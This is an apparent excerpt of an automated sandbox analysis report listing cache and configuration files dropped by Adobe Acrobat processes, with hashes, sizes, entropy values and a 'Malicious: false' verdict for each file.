MD5: | EACC587AAC5E57FB7C959AD31F90A562 |
SHA1: | 0ECBC3A464FD291970704E356FEA6F134C5E62E8 |
SHA-256: | BB6B1AF178A789A24E23EA7CE8F2061D53EB3FD85E9A0E2056893062DAD3579C |
SHA-512: | 694EA7013F548550425B7BA7823CB169E5F7DE4715D79CE12DEAF6A6B87EBB49257EE4B53EE55906D27B6DE248E6E09DCDFB08D2D2481AC2A8881422A74D6078 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 298 |
Entropy (8bit): | 5.124564240450223 |
Encrypted: | false |
SSDEEP: | 6:iO4Fq2PN72nKuAl9OmbnIFUtSkk9ZmwskkPkwON72nKuAl9OmbjLJ:7GvVaHAahFUtXk9/tkP5OaHAaSJ |
MD5: | E529FE35694A2B51E1B69CE2D0D2F242 |
SHA1: | F32F2C87B98B9F13E95787F55269418A9CFE1766 |
SHA-256: | 9CA8E0CB5ABE91A11D3D83C97BA981BFF872142A8714483F6BC9A7EE58DB7706 |
SHA-512: | 7A12ACC71298F109637B22054AECAADAEABF804838ECF7F69D4AF6BC2A6994CD020F500BE6300F4F39F1E7B9CE6DE1D842A1D8759B335C96ACFD45901B2288A5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 298 |
Entropy (8bit): | 5.124564240450223 |
Encrypted: | false |
SSDEEP: | 6:iO4Fq2PN72nKuAl9OmbnIFUtSkk9ZmwskkPkwON72nKuAl9OmbjLJ:7GvVaHAahFUtXk9/tkP5OaHAaSJ |
MD5: | E529FE35694A2B51E1B69CE2D0D2F242 |
SHA1: | F32F2C87B98B9F13E95787F55269418A9CFE1766 |
SHA-256: | 9CA8E0CB5ABE91A11D3D83C97BA981BFF872142A8714483F6BC9A7EE58DB7706 |
SHA-512: | 7A12ACC71298F109637B22054AECAADAEABF804838ECF7F69D4AF6BC2A6994CD020F500BE6300F4F39F1E7B9CE6DE1D842A1D8759B335C96ACFD45901B2288A5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.096887991682111 |
Encrypted: | false |
SSDEEP: | 6:iO4Ol9+q2PN72nKuAl9Ombzo2jMGIFUtSf5F3JZmwsf5F39VkwON72nKuAl9OmbX:7gvVaHAa8uFUt85FZ/i5Fz5OaHAa8RJ |
MD5: | 244A6FC2965E36543E4978FEA4F2D965 |
SHA1: | 8E95BB4CF7ECC54F18E630E114F7A1864C126F52 |
SHA-256: | AA87072E9E914FC0AAABB1EE714084318B66A7850218B75D4E4A9E343572FA94 |
SHA-512: | ECADE54BFB0AAAD7FC15026F0B13D6899D43FB8DA3370DB30A08F031B2BDBDBEAE9D93EB8266E779513459393E60AF6D40A2B9ACF27F139B036893BC8D6BA96C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.096887991682111 |
Encrypted: | false |
SSDEEP: | 6:iO4Ol9+q2PN72nKuAl9Ombzo2jMGIFUtSf5F3JZmwsf5F39VkwON72nKuAl9OmbX:7gvVaHAa8uFUt85FZ/i5Fz5OaHAa8RJ |
MD5: | 244A6FC2965E36543E4978FEA4F2D965 |
SHA1: | 8E95BB4CF7ECC54F18E630E114F7A1864C126F52 |
SHA-256: | AA87072E9E914FC0AAABB1EE714084318B66A7850218B75D4E4A9E343572FA94 |
SHA-512: | ECADE54BFB0AAAD7FC15026F0B13D6899D43FB8DA3370DB30A08F031B2BDBDBEAE9D93EB8266E779513459393E60AF6D40A2B9ACF27F139B036893BC8D6BA96C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\74f431b8-56c7-412b-957c-b894dc3efcf5.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.97643647695022 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq3sBdOg2HARcaq3QYiubcP7E4T3y:Y2sRdsNdMH93QYhbA7nby |
MD5: | 85AA52E4505CD8DF5F795A7E509AC64B |
SHA1: | CEBCED4BB02D983C1A1E7ACA73DD4C14C853184A |
SHA-256: | 423DFDD309740E915EC28D41BE1C59797ECA85C906B841924C0D924655BDD52B |
SHA-512: | 85330B2A388BF96336CA818690146A7F8A83F956AFDEF4E1B00EFFEEB3765AF7F4184AAE21BD8772BC9B88B4455AC9FEB6337FF4510028186D977A0EFE131128 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.97643647695022 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq3sBdOg2HARcaq3QYiubcP7E4T3y:Y2sRdsNdMH93QYhbA7nby |
MD5: | 85AA52E4505CD8DF5F795A7E509AC64B |
SHA1: | CEBCED4BB02D983C1A1E7ACA73DD4C14C853184A |
SHA-256: | 423DFDD309740E915EC28D41BE1C59797ECA85C906B841924C0D924655BDD52B |
SHA-512: | 85330B2A388BF96336CA818690146A7F8A83F956AFDEF4E1B00EFFEEB3765AF7F4184AAE21BD8772BC9B88B4455AC9FEB6337FF4510028186D977A0EFE131128 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5449 |
Entropy (8bit): | 5.253470015304417 |
Encrypted: | false |
SSDEEP: | 96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7aNRLf:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhi |
MD5: | 36535AD3199735FE3FEA07A09770F82A |
SHA1: | 35133C6DB62CBE8002C076BEC7500ACA9D13322A |
SHA-256: | 28B462DD0E58AEDAC8869A87141D8F43F40C4781A776E0E62657B30024EBA833 |
SHA-512: | C5EB8595D71477F7B7A73D0F385268A21D41D883112243AC189DCDEF3749D5F8BA183114698E7CD86A6795ED22338061ECA367EE496B5410E9E46E3DC808664C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.091062987359131 |
Encrypted: | false |
SSDEEP: | 6:iO43l89+q2PN72nKuAl9OmbzNMxIFUtSwFf9JZmws6Ff99VkwON72nKuAl9OmbzE:7MlrvVaHAa8jFUt3FfH/L5OaHAa84J |
MD5: | 2F507326D1A16B24B5EF69877B93DD38 |
SHA1: | AB19B2780244FD9FF9EF485C74902EBA6A4CEFF1 |
SHA-256: | 5BD1E559545780B5D2EB63C082DA5E0DB07F3F5CFCAF954E26AA048E8FF273AE |
SHA-512: | 9DC012604E72C20A7766341E8E32D514087F06EB742379137A46C6DE61F21F8C0904940CFBAEAEB8182E1EBFB8E27E3E13CD6B3E1AD7C55240FC38DC8E0F2E04 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.091062987359131 |
Encrypted: | false |
SSDEEP: | 6:iO43l89+q2PN72nKuAl9OmbzNMxIFUtSwFf9JZmws6Ff99VkwON72nKuAl9OmbzE:7MlrvVaHAa8jFUt3FfH/L5OaHAa84J |
MD5: | 2F507326D1A16B24B5EF69877B93DD38 |
SHA1: | AB19B2780244FD9FF9EF485C74902EBA6A4CEFF1 |
SHA-256: | 5BD1E559545780B5D2EB63C082DA5E0DB07F3F5CFCAF954E26AA048E8FF273AE |
SHA-512: | 9DC012604E72C20A7766341E8E32D514087F06EB742379137A46C6DE61F21F8C0904940CFBAEAEB8182E1EBFB8E27E3E13CD6B3E1AD7C55240FC38DC8E0F2E04 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.444403026015316 |
Encrypted: | false |
SSDEEP: | 384:Se+ci5thiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:Kys3OazzU89UTTgUL |
MD5: | 4FD7D905C23A283465694C64CBF80EA7 |
SHA1: | E479B6E4A00BD4BA36E5953E4D5BA89D920F2808 |
SHA-256: | EC88CDCCAC92355683912CD2033C6C8B44A7C772A048E894A04DF9F77F3FB101 |
SHA-512: | 0138232FF3CA84BA9CD6116368DBA041399751FD0AB94EB62D46D7785F18F51DFD3C14E2679BFB1BA3EE9D876F075085C1C9855A28D3574537D0FAC339E6CCC9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | modified |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2147030890558894 |
Encrypted: | false |
SSDEEP: | 24:7+thNynuwKUqLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9R:7MhInCUqPmFTIF3XmHjBoGGR+jMz+Lhv |
MD5: | 45AB021AA833491B5F11E40928535B72 |
SHA1: | E4E87536592B3D205EE992035DA3092D09ED02E0 |
SHA-256: | C2B4B411F5E01D0908513E87C0153BA72F3C23FF865C32CB09339D4C1913422E |
SHA-512: | 7E5CF43EE79F59FDD92FCB180A000C4DD0D8B64CD74973F3DD620FBED3EFC15B49C38C98AFA1FB7C8818DD609D49BA23536B495325F823C2710144494CF8EA82 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7425532007658724 |
Encrypted: | false |
SSDEEP: | 3:kkFklqy41DM/tfllXlE/HT8k+/zXNNX8RolJuRdxLlGB9lQRYwpDdt:kKzxM/eT8DNMa8RdWBwRd |
MD5: | 4F3EFFC15E227C07ED878CEB27A72AEA |
SHA1: | E6BEB8849ACB8B482B5971DF1980DDB5E767DD0B |
SHA-256: | 40B905C2CD4DDC765F2711F694430353548EE691A1BF7F3EB6C894296D41782E |
SHA-512: | 7149A22E1131774EE5556D0EA5B461E2DC16C3116820AF454EEDBD73CD416A1796732894AF89F8167F513F402ABC8B3A73CF128197A3439FFB91732FFCA76260 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.360517627099855 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX5R8s9nKGnZiQ0YcSKoAvJM3g98kUwPeUkwRe9:YvXKX53vcm5GMbLUkee9 |
MD5: | C49B105F3C9F3BA5D4C69E6C384D8173 |
SHA1: | 557A9F28B0445F245620515A750171A292C5CF09 |
SHA-256: | B6BC93E64558CC2A55972ABD621F79AF2981A5BF34F9EEB99C725C26AD45E1FE |
SHA-512: | 5390E990FDDCE2D3DE7899DAFD3F80A893161074F38F5F30D7B9788C7AA4509E4DA78912144AD001F2347DF9ABF1FE8BED632D41744C223B406C19EA0247EC50 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.3140030977532415 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX5R8s9nKGnZiQ0YcSKoAvJfBoTfXpnrPeUkwRe9:YvXKX53vcm5GWTfXcUkee9 |
MD5: | 84F52358C315DC121B58FAE7BC8271B2 |
SHA1: | 09FDFDC3EB90CECD6E5B4997292E6379C1677DDD |
SHA-256: | 116C5ACB177D7BD7398D40D80DE4867C91B4A82235BD7421284509845EB90046 |
SHA-512: | 68B1B81ABFEE37878008D33000B24D35CDAC4C96C4B7C06D3D8E424FE8E3C92CB1698A42B3F52E7F04BA2FAB0A5C605C598CD9E14A32E5045181A70065EAEE10 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.29270931198012 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX5R8s9nKGnZiQ0YcSKoAvJfBD2G6UpnrPeUkwRe9:YvXKX53vcm5GR22cUkee9 |
MD5: | F6B26938AE1B334D39A4CE581D7EA0F6 |
SHA1: | 22EE34BBF80A1FEF9DC0AECE62979A0E811B1233 |
SHA-256: | F1A8DF9FB792F476643C55EA5E316FF3EE498AE63D5EF63981496547A7FA0038 |
SHA-512: | 9E6843B21B2F96ADD47E61DAA3D5D9BC7A47524E3CA832F077DBB8D2381A89F653E55DB85747C5FFFC6C85BC27EB7CD25075801BD4744347F60206BD62F9EF90 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.340440351563183 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX5R8s9nKGnZiQ0YcSKoAvJfPmwrPeUkwRe9:YvXKX53vcm5GH56Ukee9 |
MD5: | 9CB2DF0DE67107FF64AA9BB50F8136C8 |
SHA1: | C396AE20CE06693449402327EE226BB152CF1877 |
SHA-256: | 3F2D66FD041C6157099B1574F0FAE2B1F6B1D83E5F76A49129F70260350F1045 |
SHA-512: | 52EEF289F3FEA587EE889A2605CF4D2C9C74D75EE380DC4665B90B8E5AAF19CB56536D22E7A35D114C2957FF8C9740534A319C831DED30F099D7E12B5B0C7870 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.691261432115545 |
Encrypted: | false |
SSDEEP: | 24:Yv6X53UmepLgE9cQx8LennAvzBvkn0RCmK8czOCCSb:Yvm5ehgy6SAFv5Ah8cv/b |
MD5: | B80DE105AE7CD3733C75B4DB72019395 |
SHA1: | 75E788621826AA5BD33C1096339CE66B046C5146 |
SHA-256: | 1E4B18211175EDBC0667902C20D067D88A5D914AE0A8D65F65292E2C9C2DB1D8 |
SHA-512: | 284A7F391B47CB0D0CA17547549E32D9FAF67682017973F91CE2E0141B3F64BD663F5EA33E6DB12DE680497C58EED845BEDF4DBEAF91757BD26CF8EEA074DE8F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.290980478252347 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX5R8s9nKGnZiQ0YcSKoAvJf8dPeUkwRe9:YvXKX53vcm5GU8Ukee9 |
MD5: | 4B1B7B9E156F0B545B104F17E60A340D |
SHA1: | B9424FE195ECAD3EB81C4987C9B8AD69CE111140 |
SHA-256: | 868D24C3730A8882ECED4ADD47F0D53B859D2B102D619391CBE7496DC609FFDF |
SHA-512: | 5B1B6EA00158C4DC8794A1B7ACCF2C1B36596F18DE5FCABB1E0649EDC9F511433D49204006DF607C22EF90A58D6022E2767B6DA98DF46B07CDDAA7191E0F1BE1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.294016196109878 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX5R8s9nKGnZiQ0YcSKoAvJfQ1rPeUkwRe9:YvXKX53vcm5GY16Ukee9 |
MD5: | 26333F4D9EA3B4D835E60BFCBD0671D1 |
SHA1: | 5BBFBA834A858106F58071B105752A00746CAE7B |
SHA-256: | D27F23083A05DBDB9F35ABAA15C40D2B9E567FF556C29E3DAC56895387B0754A |
SHA-512: | E00C9DA7E989D8657C53B7B1B931BDA295984BD8BB500FBE4725C89F6DDEB601075EECC20C87F9EAA3A3492AFAF40CD59AB53387E42062370BFB6FC6F4BCAE10 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.30096497916115 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX5R8s9nKGnZiQ0YcSKoAvJfFldPeUkwRe9:YvXKX53vcm5Gz8Ukee9 |
MD5: | 6D49361A77DA85213E2ECD01EBD14190 |
SHA1: | 51516EB5C2AC5FAD1A120A437C84ACD612039BB7 |
SHA-256: | 9EC271FB4D49489EA5FB4A240BE98EA2C0F00A57894ED70F4AB7AAD476350F25 |
SHA-512: | A786893DC2104634540B515B8BED3CD0F4C358C2C828267E1F1DEF8C2926E322755B8A5D0A4297922C2C221044A5DD98E3BBA32BD06C22D9BD72CE6689C33984 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.317638467609814 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX5R8s9nKGnZiQ0YcSKoAvJfzdPeUkwRe9:YvXKX53vcm5Gb8Ukee9 |
MD5: | 50EFED4FFC0172CB703A005BDC9C1398 |
SHA1: | 540BA67BC31CE30E936C080279EC14AA842FA5A4 |
SHA-256: | AB335843808CA7FF9F4579D1B7E264179E8D54FCB9B6D85BE0D3D607D0C5E8D4 |
SHA-512: | DE74AAE24AA701C10B2481D31A0EFBA53878AE8372F0050CA1BE9C4B5817761034C87D83B9153CEF8B3855BFE3DA3908080AFDC441CDB138AC23AB56014DCC74 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.29824639405183 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX5R8s9nKGnZiQ0YcSKoAvJfYdPeUkwRe9:YvXKX53vcm5Gg8Ukee9 |
MD5: | 7E87654D7324A1DCBA2D4221AA0AFFB9 |
SHA1: | 9AAF8628110C3F38DD8404579C4125A4BEDBFC8F |
SHA-256: | A028CF378B8463DD45C93E29CAC02289357DC226E1B984A83DE6029E79BBD04F |
SHA-512: | 6A971D9B79E9C8749B73604403A21C48F8C9609B2521D226B2B0906BF79A772590D4177DB34544D45A96D81E27D683F65DE5A07B12B871C354F95A89E70E9CE7 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.284265893530546 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX5R8s9nKGnZiQ0YcSKoAvJf+dPeUkwRe9:YvXKX53vcm5G28Ukee9 |
MD5: | 715ABEFEBEF50B665BCDEB38DEFA8CE8 |
SHA1: | 6A6EF67F0DF53EC97B34668AF4B5EC595094F419 |
SHA-256: | 770C567869EDBD412C0E9DD541914DADCA473F4BC4CE6622E2EEFF45E5A129FF |
SHA-512: | 3D19517AD04F3E0D51D9BDC64A135E5E21102C325432292D6DA0C015C52DEF76DE20E2B39C6D5F6D989829CF7F619AF19A8AC5A6E0135C30A82E44BC1274CA9E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.281805544000251 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX5R8s9nKGnZiQ0YcSKoAvJfbPtdPeUkwRe9:YvXKX53vcm5GDV8Ukee9 |
MD5: | 46442F9AFAC8DEDEBCE34A3795F2AD81 |
SHA1: | 33620D0E1A6C2F17CA7FC4CBFA2578D4FF07AB7D |
SHA-256: | 790B6E2139792849F3C80AFACF4307D9CBDF7C677153D4C3BCCFE1EFC0252E01 |
SHA-512: | 0C82847CD4AEA3983E76FE1CD3EEABCB91BD95711250692915359758D0AB026CD964D4E306984CAB31654EE43030261DBF80F8FFFDAAD974FC56393025B3B719 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.285162591788761 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX5R8s9nKGnZiQ0YcSKoAvJf21rPeUkwRe9:YvXKX53vcm5G+16Ukee9 |
MD5: | E3DBF884F7EDEE476BEC0CD1133EF4ED |
SHA1: | 6993F21101911636C585EB83FF8D6EC175A96E05 |
SHA-256: | B183ABC907BB1713A7E77247AD88F57927F20CAF3488E5C687785C9E247D6D4D |
SHA-512: | 5BB97DAA7B590428CBF5F305D98BF60CD6C689C75CC409D22A14F75B1DFDFEA76D91290954B60A39A9F03002F988FF77A46DBBB933827F66A4A19A9131DC5901 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.666678959950849 |
Encrypted: | false |
